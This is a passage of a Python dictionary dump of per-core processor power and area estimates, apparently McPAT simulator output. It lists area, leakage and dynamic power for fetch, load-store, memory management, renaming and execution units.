'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 1.96532e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.71469e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 6.6537e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000765008,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000821462,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000187397,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0511951,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.25645,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.125991,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.173882,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.63301,
'Instruction Fetch Unit/Runtime Dynamic': 0.352077,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.036246,
'L2/Runtime Dynamic': 0.0100031,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.39724,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.04952,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0698849,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0698849,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.72725,
'Load Store Unit/Runtime Dynamic': 1.46406,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.172324,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.344648,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0611584,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0616879,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.202474,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0206984,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.463642,
'Memory Management Unit/Runtime Dynamic': 0.0823863,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 18.4324,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.279899,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0111519,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0822257,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.373277,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.11806,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.130955,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.305546,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.753334,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.271238,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.437498,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.220834,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.92957,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.194722,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.5049,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.142321,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.011377,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.129421,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0841396,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.271742,
'Execution Unit/Register Files/Runtime Dynamic': 0.0955165,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.3054,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.68688,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.42289,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000483882,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000483882,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000424306,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000165812,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00120867,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00260074,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00453774,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0808855,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.14501,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.166366,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.274724,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.61323,
'Instruction Fetch Unit/Runtime Dynamic': 0.529113,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0297673,
'L2/Runtime Dynamic': 0.00664102,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.49339,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.08708,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0729957,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0729956,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.83809,
'Load Store Unit/Runtime Dynamic': 1.52007,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.179995,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.359989,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0638808,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0643252,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.319898,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0272806,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.585743,
'Memory Management Unit/Runtime Dynamic': 0.0916058,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 21.1612,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.374381,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0167937,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.131313,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.522487,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.09281,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 2.83407e-06,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202691,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.01201e-05,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.141275,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.227872,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.115022,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.48417,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.161576,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.13902,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 1.91191e-06,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00592573,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0428516,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0438244,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0428535,
'Execution Unit/Register Files/Runtime Dynamic': 0.0497501,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0902771,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.232029,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.37402,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00203189,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
